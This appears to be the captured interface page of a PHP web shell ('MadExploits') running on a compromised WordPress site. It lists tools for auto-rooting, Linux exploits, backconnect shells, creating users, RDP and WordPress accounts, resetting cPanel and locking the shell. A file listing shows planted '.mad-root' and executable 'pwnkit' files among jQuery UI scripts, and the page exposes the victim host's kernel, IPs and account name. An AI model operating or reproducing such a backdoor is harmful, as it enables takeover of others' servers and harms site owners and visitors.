Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
www /
ALL /
wp-includes /
js /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
accordion.min.js
8.37
KB
-rw-r--r--
autocomplete.min.js
8.04
KB
-rw-r--r--
button.min.js
7.05
KB
-rw-r--r--
core.min.js
3.84
KB
-rw-r--r--
datepicker.min.js
35.53
KB
-rw-r--r--
dialog.min.js
11.81
KB
-rw-r--r--
draggable.min.js
18.41
KB
-rw-r--r--
droppable.min.js
6.1
KB
-rw-r--r--
effect-blind.min.js
1.1
KB
-rw-r--r--
effect-bounce.min.js
1.21
KB
-rw-r--r--
effect-clip.min.js
912
B
-rw-r--r--
effect-drop.min.js
993
B
-rw-r--r--
effect-explode.min.js
1.14
KB
-rw-r--r--
effect-fade.min.js
515
B
-rw-r--r--
effect-fold.min.js
1
KB
-rw-r--r--
effect-highlight.min.js
789
B
-rw-r--r--
effect-puff.min.js
783
B
-rw-r--r--
effect-pulsate.min.js
798
B
-rw-r--r--
effect-scale.min.js
1.08
KB
-rw-r--r--
effect-shake.min.js
1.08
KB
-rw-r--r--
effect-size.min.js
3.18
KB
-rw-r--r--
effect-slide.min.js
961
B
-rw-r--r--
effect-transfer.min.js
857
B
-rw-r--r--
effect.min.js
12.96
KB
-rw-r--r--
menu.min.js
9.33
KB
-rw-r--r--
mouse.min.js
3.07
KB
-rw-r--r--
position.min.js
6.33
KB
-rw-r--r--
progressbar.min.js
2.41
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
resizable.min.js
17.97
KB
-rw-r--r--
selectable.min.js
4.16
KB
-rw-r--r--
selectmenu.min.js
8.17
KB
-rw-r--r--
slider.min.js
10.67
KB
-rw-r--r--
sortable.min.js
24.31
KB
-rw-r--r--
spinner.min.js
6.9
KB
-rw-r--r--
tabs.min.js
11.75
KB
-rw-r--r--
tooltip.min.js
5.53
KB
-rw-r--r--
widget.min.js
6.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mouse.min.js
/*! * jQuery UI Mouse 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/mouse/ */ !function(e){"function"==typeof define&&define.amd?define(["jquery","./widget"],e):e(jQuery)}(function(o){var u=!1;return o(document).mouseup(function(){u=!1}),o.widget("ui.mouse",{version:"1.11.4",options:{cancel:"input,textarea,button,select,option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.bind("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).bind("click."+this.widgetName,function(e){if(!0===o.data(e.target,t.widgetName+".preventClickEvent"))return o.removeData(e.target,t.widgetName+".preventClickEvent"),e.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.unbind("."+this.widgetName),this._mouseMoveDelegate&&this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate)},_mouseDown:function(e){if(!u){this._mouseMoved=!1,this._mouseStarted&&this._mouseUp(e),this._mouseDownEvent=e;var t=this,s=1===e.which,i=!("string"!=typeof this.options.cancel||!e.target.nodeName)&&o(e.target).closest(this.options.cancel).length;return!(s&&!i&&this._mouseCapture(e))||(this.mouseDelayMet=!this.options.delay,this.mouseDelayMet||(this._mouseDelayTimer=setTimeout(function(){t.mouseDelayMet=!0},this.options.delay)),this._mouseDistanceMet(e)&&this._mouseDelayMet(e)&&(this._mouseStarted=!1!==this._mouseStart(e),!this._mouseStarted)?(e.preventDefault(),!0):(!0===o.data(e.target,this.widgetName+".preventClickEvent")&&o.removeData(e.target,this.widgetName+".preventClickEvent"),this._mouseMoveDelegate=function(e){return t._mouseMove(e)},this._mouseUpDelegate=function(e){return t._mouseUp(e)},this.document.bind("mousemove."+this.widgetName,this._mouseMoveDelegate).bind("mouseup."+this.widgetName,this._mouseUpDelegate),e.preventDefault(),u=!0))}},_mouseMove:function(e){if(this._mouseMoved){if(o.ui.ie&&(!document.documentMode||document.documentMode<9)&&!e.button)return this._mouseUp(e);if(!e.which)return this._mouseUp(e)}return(e.which||e.button)&&(this._mouseMoved=!0),this._mouseStarted?(this._mouseDrag(e),e.preventDefault()):(this._mouseDistanceMet(e)&&this._mouseDelayMet(e)&&(this._mouseStarted=!1!==this._mouseStart(this._mouseDownEvent,e),this._mouseStarted?this._mouseDrag(e):this._mouseUp(e)),!this._mouseStarted)},_mouseUp:function(e){return this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate),this._mouseStarted&&(this._mouseStarted=!1,e.target===this._mouseDownEvent.target&&o.data(e.target,this.widgetName+".preventClickEvent",!0),this._mouseStop(e)),u=!1},_mouseDistanceMet:function(e){return Math.max(Math.abs(this._mouseDownEvent.pageX-e.pageX),Math.abs(this._mouseDownEvent.pageY-e.pageY))>=this.options.distance},_mouseDelayMet:function(){return this.mouseDelayMet},_mouseStart:function(){},_mouseDrag:function(){},_mouseStop:function(){},_mouseCapture:function(){return!0}})});
Close